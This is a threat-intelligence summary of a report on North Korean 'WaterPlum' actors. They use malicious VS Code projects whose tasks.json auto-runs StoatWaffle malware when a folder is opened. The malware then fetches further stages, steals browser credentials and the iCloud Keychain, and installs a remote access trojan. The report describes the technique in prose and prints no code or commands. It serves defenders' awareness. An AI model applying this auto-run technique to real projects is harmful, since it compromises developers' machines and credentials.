North Korean threat actors known as WaterPlum are using malicious Microsoft Visual Studio Code projects to distribute a malware family called StoatWaffle. These attacks leverage a specific configuration file to automatically execute malicious code and download payloads whenever a developer opens the infected project folder.
North Korean cyber operators associated with the Contagious Interview campaign have shifted their tactics to target developers through compromised Microsoft Visual Studio Code environments. By utilizing a malware family identified as StoatWaffle, these actors embed malicious instructions within the projects tasks.json file. This specific configuration uses a setting that triggers the malware automatically the moment any file within the project directory is accessed, making the infection seamless and difficult for the user to detect during their normal workflow.
Once triggered, the initial script connects to a web application hosted on Vercel to download additional components. The malware is designed to be cross-platform, meaning it can function on various operating systems even though many observed attacks target Windows users. Upon execution, the script first verifies the presence of Node.js on the host system. If the environment lacks this runtime, the malware silently downloads and installs the official version of Node.js to ensure it has the necessary infrastructure to run its subsequent stages.
After the environment is prepared, the malware launches a downloader that periodically communicates with an external server to retrieve further instructions. This process involves a multi-stage approach where the downloader repeatedly polls a command-and-control server for new Node.js code to execute. This behavior allows the attackers to maintain a persistent connection and update the malicious capabilities on the infected machine dynamically based on their current objectives.
The StoatWaffle framework typically deploys two primary malicious modules once it has established a foothold. The first is an information stealer designed to extract sensitive data from web browsers, including saved credentials and extension data from Chromium and Firefox. On macOS systems, this module is specifically programmed to target and exfiltrate the iCloud Keychain database. This highlights the focus of the threat actors on gathering high-value authentication data that can be used for further network penetration.
The second module is a remote access trojan that provides the attackers with comprehensive control over the compromised host. Through this tool, the actors can navigate the file system, upload or search for specific files, and execute arbitrary shell commands. This level of access enables the threat actors to conduct long-term espionage, steal intellectual property, or use the infected machine as a pivot point for broader attacks within a target organization.
Source: https://jp.security.ntt/insights_resources/tech_blog/stoatwaffle_malware_en/